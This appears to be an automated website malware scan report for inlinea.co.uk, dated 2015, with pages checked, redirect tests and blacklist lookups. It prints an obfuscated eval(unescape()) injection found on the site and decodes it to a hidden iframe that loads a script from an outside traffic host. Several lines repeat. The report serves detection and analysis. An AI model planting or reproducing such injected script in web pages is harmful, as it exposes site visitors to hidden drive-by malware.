Scanned pages/files
Request | Server response | Status |
http://inlinea.co.uk/ | 200 OK Content-Length: 48604 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%35%34%33%34%33%37%37%34%65%34%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%63%6e%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%39%34%31%34%30%29%2b%27%35%63%36%62%64%63%31%36%30%63%5c%27%20%77%69%64%74%68%3d%33%34%30%20%68%65%69%67%68%74%3d%35%37%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Decoded script: window.status='Done';document.write('<iframe name=54343774e49 src=\'http://alltraff.cn/traff.php?'+Math.round(Math.random()*194140)+'5c6bdc160c\' width=340 height=571 style=\'display: none\'></iframe>') window.status='Done';document.write('<iframe name=54343774e49 src=\'http://alltraff.cn/traff.php?'+Math.round(Math.random()*194140)+'5c6bdc160c\' width=340 height=571 style=\'display: none\'></iframe>') <iframe name=54343774e49 src='http://alltraff.cn/traff.php?1879325c6bdc160c' width=340 height=571 style='display: none'></iframe> Antivirus reports:
| ||
http://inlinea.co.uk/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inlinea.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Sep 2015 16:45:53 GMT
Upgrade: TLS/1.0, HTTP/1.1
Upgrade: TLS/1.0, HTTP/1.1
Accept-Ranges: bytes
ETag: "2280574-bddc-4417d00ae8f40"
Server: nginx/1.7.6
Content-Length: 48604
Content-Type: text/html
Last-Modified: Mon, 17 Dec 2007 15:24:05 GMT
...48604 bytes of data.
GET / HTTP/1.1
Host: inlinea.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Sep 2015 16:45:53 GMT
Upgrade: TLS/1.0, HTTP/1.1
Upgrade: TLS/1.0, HTTP/1.1
Accept-Ranges: bytes
ETag: "2280574-bddc-4417d00ae8f40"
Server: nginx/1.7.6
Content-Length: 48604
Content-Type: text/html
Last-Modified: Mon, 17 Dec 2007 15:24:05 GMT
...48604 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: inlinea.co.uk
Referer: http://www.google.com/search?q=inlinea.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: inlinea.co.uk
Referer: http://www.google.com/search?q=inlinea.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inlinea.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://inlinea.co.uk/
Result: inlinea.co.uk is not infected or malware details are not published yet.
Result: inlinea.co.uk is not infected or malware details are not published yet.